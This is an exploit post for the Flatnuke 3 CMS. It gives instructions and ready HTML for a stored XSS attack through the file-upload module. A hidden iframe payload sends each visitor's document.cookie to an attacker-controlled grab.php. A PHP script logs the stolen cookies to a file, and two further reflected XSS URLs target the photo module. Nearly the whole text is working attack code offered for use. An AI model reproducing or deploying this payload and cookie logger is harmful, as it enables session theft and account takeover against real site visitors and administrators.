Flatnuke 3 Cookie Grabber Exploit

`<!--  
exploit flatnux grabber cookies visitor  
site :http://www.speleoalex.altervista.org/flatnuke3/index.php  
download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download  
author:gmda  
  
Flatnux does not filter code html/javascript then you can injector in this way:  
  
operation  
1] register  
2] make longin  
3] use the HTML code below  
-->  
<html><head>  
</head>  
<body>  
<form enctype="multipart/form-data" action="http://victim.org/flatnux/index.php?mod=08_Files&opmod=insertrecord" method="POST">  
titolo*<input size ="20" style="visibility:hidden;" value="filex <iframe width="0" height="0" style="visibility:hidden;" src="javascript:window.location='http://attacker.org/grab.php?cmd='+document.cookie;"></iframe>" name="name" type="text" /><br />  
<textarea title="Inserisci qui la descrizione" cols="80" rows="10" name="description" style="visibility:hidden;" ></textarea><br />  
Immagine<input size="20" name="foto1" type="file" style="visibility:hidden;" /><br />  
File<input size="20" name="file" type="file" style="visibility:hidden;" /><br />  
<input type="submit" value="Zic">  
</form>  
</body></html>  
<!-- grab.php  
<?php $data = $_GET['cmd'];  
$date=date("j F, Y, g:i a");  
$referer=$_SERVER['HTTP_REFERER'];  
$fh = fopen("cookie.txt",'a+');  
fwrite($fh, $referer . " / " . $data."\n".$date."\n");  
fclose($fh);  
?>  
-->  
  
<!-- xss variables mod foto  
  
/sections/05_Foto/photo.php?mod=05_Foto&foto=>"><script>alert(69)%3B</script>&lang=it  
/?mod=%3E%22%3E%3Cscript%3Ealert(69)%3B%3C/script%3E  
  
-->  
  
`